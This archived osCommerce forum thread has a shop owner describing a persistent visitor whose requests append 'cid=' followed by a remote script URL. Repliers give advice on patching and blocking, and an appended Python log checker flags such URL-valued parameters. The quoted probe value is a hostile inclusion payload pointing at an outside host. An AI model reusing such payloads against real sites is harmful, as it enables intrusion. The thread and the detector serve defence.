osCommerce

Covert activity as seen in "who's online" - Please help


ITISI

Posted

As seen through Who's Online, I have an ongoing problem with a visitor/session that remains in my site for many hours. I've seen 16+ hours at a time. This has been going on for weeks at a minimum. My host is at a loss and as far as they are concerned they do not see any problem from their end.

I did see a post discussing something similar redirecting traffic elsewhere.

Some facts...

1. Their IP address changes frequently but their time online continues to increment.

2. Their Last URL changes along with their IP address.

3. The displayed IP addresses are real, although I'm concerned they are masking their real IP, and just cycling through a list of valid IPs, in which case I probably don't want to block.

4. I've restarted my site via my host control panel many times but they come right back. In fact, the amount of time on the site for their session continues to increment as if the restart did not knock them off the site.

5. The Last URL rotates between many of my web pages, but often includes additional appended text that begins with "cid=" then a URL. For example cid=http://cherrygirl.h18.ru/images/cs.txt?. I've visited these URLs which only contain some sort of a script.

Any insight would be great.

Also, I'm trying to find a reliable osCommerce technical resource so if you know of a professional that can assist me, it would be greatly appreciated.

Thanks much

Posted

The appended URL looks like they are looking for an XSS (cross-site scripting) vulnerability. Is your site fully up to date with all recommended security fixes?

You may get some peace of mind by installing the Security Pro contribution, which guards your querystring against attacks like this.

Posted

You might try a contribution that allows you to block the IP address. There is http://addons.oscommerce.com/info/2532 and there may be others. He's obviously not a customer, so banning his IP wouldn't hurt and it'll keep him from being able to figure out how to hack your site and/or steal your bandwidth.

Posted

Thanks Dave. Unfortunately it appears he rotates valid URLs instead of displaying his own.

Posted

Thanks for the suggestions. I have no idea if I'm up to date and I'm looking for an osCommerce person to assist me. Please let me know if you'd like to take care of this for me. (paid of course) I can be reached at [email protected]
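An added example, not part of any post in this thread: a log check that flags requests whose query-string parameter carries an absolute URL (the "cid=http://..." pattern described in the first post) and groups the client IPs by parameter and value, so the probe is identified by what it sends rather than by its changing address. The log format, sample lines, host remote.example and the function names are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Constructed sample lines (Apache common log format). Client IPs are from
# documentation ranges and remote.example is a placeholder host.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2008:04:11:02 +0000] "GET /product_info.php?products_id=12&cid=http://remote.example/images/cs.txt? HTTP/1.1" 200 5120
198.51.100.23 - - [12/Mar/2008:04:11:40 +0000] "GET /index.php?cPath=3&cid=http://remote.example/images/cs.txt? HTTP/1.1" 200 4801
192.0.2.55 - - [12/Mar/2008:04:12:09 +0000] "GET /index.php?cPath=3_10 HTTP/1.1" 200 4790
203.0.113.99 - - [12/Mar/2008:04:13:31 +0000] "GET /shopping_cart.php?cid=http%3A%2F%2Fremote.example%2Fimages%2Fcs.txt%3F HTTP/1.1" 200 3999
"""

LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "[A-Z]+ (\S+)')
REMOTE_URL = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)


def find_remote_url_params(log_text):
    """Map (parameter, value) -> set of client IPs for URL-valued parameters."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        ip, target = m.groups()
        query = target.partition("?")[2]
        # parse_qsl percent-decodes, so encoded variants are caught as well
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_URL.match(value):
                hits[(name, value.strip())].add(ip)
    return dict(hits)


def shared_payloads(hits, min_ips=2):
    """Payloads sent from several addresses: one campaign, rotating sources."""
    return sorted((name, value, sorted(ips))
                  for (name, value), ips in hits.items() if len(ips) >= min_ips)


if __name__ == "__main__":
    for name, value, ips in shared_payloads(find_remote_url_params(SAMPLE_LOG)):
        print(f"{name}={value} seen from {len(ips)} addresses: {', '.join(ips)}")
```
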

Archived

This topic is now archived and is closed to further replies.
